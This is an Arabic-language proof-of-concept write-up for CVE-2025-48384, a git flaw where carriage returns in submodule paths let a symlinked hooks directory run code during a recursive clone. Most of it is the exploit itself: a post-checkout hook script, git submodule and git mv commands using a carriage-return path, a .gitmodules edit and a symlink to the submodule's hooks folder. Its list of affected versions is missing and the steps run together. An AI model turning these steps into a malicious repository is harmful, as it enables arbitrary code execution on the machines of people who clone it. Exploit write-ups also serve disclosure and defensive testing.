
إثبات مفهوم لـ CVE-2025-48384
تأخذ CVE-2025-48384 شكل ثغرة في حل الروابط غير الصحيح (اتباع الروابط) في git. على وجه التحديد، يتم تحليل أسماء الملفات التي تحتوي على أحرف إرجاع بشكل غير صحيح في .git/config، وقد يؤدي تضمين رابط رمزي يشير إلى ملف git hook قابل للتنفيذ موجود في وحدة فرعية كدليل hooks للوحدة الفرعية إلى تنفيذ تعليمات برمجية عشوائية عند استنساخ المستودع باستخدام git clone --recursive.
Git لنظام Microsoft Windows لا يتأثر بهذه الثغرة، مما يترك بشكل أساسي إصدارات git محددة على Linux و MacOS عرضة للخطر. الإصدارات المتأثرة هي:
post-checkout لتنفيذ التعليمات البرمجية عند استنساخ مستودع poc بشكل متكرر:#!/bin/bash
touch ~/hackedlol
git submodule add https://github.com/<your submodule repo>.git subgit mv sub $(printf "sub\r")printf "\tpath = \"sub\r\"\n" إلى .gitmodules وقم بإزالة المسار الأصلي.ln -s .git/modules/sub/hooks sub